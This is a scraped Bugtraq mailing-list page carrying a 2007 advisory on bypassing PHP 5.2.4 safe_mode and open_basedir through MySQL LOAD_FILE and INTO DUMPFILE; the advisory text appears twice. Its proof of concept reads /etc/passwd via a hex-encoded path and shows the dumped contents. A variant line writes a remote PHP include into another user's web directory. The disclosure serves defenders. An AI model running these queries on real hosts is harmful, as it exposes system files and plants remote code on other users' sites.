Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass
Sep 11 2007 04:38AM
laurent gaffie gmail com
(2 replies)
Application: PHP <=5.2.4
Web Site: http://php.net
Platform: unix
Bug: safemode & open_basedir bypass
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Credits
===========
1) Introduction
===========
"PHP is a widely-used general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML."
======
2) Bug
======
various mysql functions safemode & open_basedir bypass
( LOAD_FILE , INTO DUMPFILE , INTO OUTFILE )
=====
3)Proof of concept
=====
/*
debian:~# php -v
PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
*/
debian:/test/mysql# ls
debian:/test/mysql#
<?php
mysql_connect("localhost", "granted_user","something");
mysql_query("select load_file(0x2F6574632F706173737764)into dumpfile'/test/123.txt';");
?>
debian:/test/mysql# ls
123.txt
debian:/test/mysql#
debian:/test/mysql# vim 123.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
variant : select '<?include("http://site.com/hello.html")?>' into dumpfile '/home/NOT_MY_USER/www/index1.php';
=====
4)Credits & greets
=====
laurent gaffié
laurent.gaffié@gmail.com
greets: Mattias Bengtsson (see http://php.net).
[ reply ]
Re: PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass
Sep 12 2007 12:27PM
Ben Wheeler (b wheeler ulcc ac uk)
Re: PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass
Sep 12 2007 05:59AM
Ronald Chmara (ron Opus1 COM)
Privacy Statement
Copyright 2009, SecurityFocus
Web Site: http://php.net
Platform: unix
Bug: safemode & open_basedir bypass
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Credits
===========
1) Introduction
===========
"PHP is a widely-used general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML."
======
2) Bug
======
various mysql functions safemode & open_basedir bypass
( LOAD_FILE , INTO DUMPFILE , INTO OUTFILE )
=====
3)Proof of concept
=====
/*
debian:~# php -v
PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
*/
debian:/test/mysql# ls
debian:/test/mysql#
<?php
mysql_connect("localhost", "granted_user","something");
mysql_query("select load_file(0x2F6574632F706173737764)into dumpfile'/test/123.txt';");
?>
debian:/test/mysql# ls
123.txt
debian:/test/mysql#
debian:/test/mysql# vim 123.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
variant : select '<?include("http://site.com/hello.html")?>' into dumpfile '/home/NOT_MY_USER/www/index1.php';
=====
4)Credits & greets
=====
laurent gaffié
laurent.gaffié@gmail.com
greets: Mattias Bengtsson (see http://php.net).
[ reply ]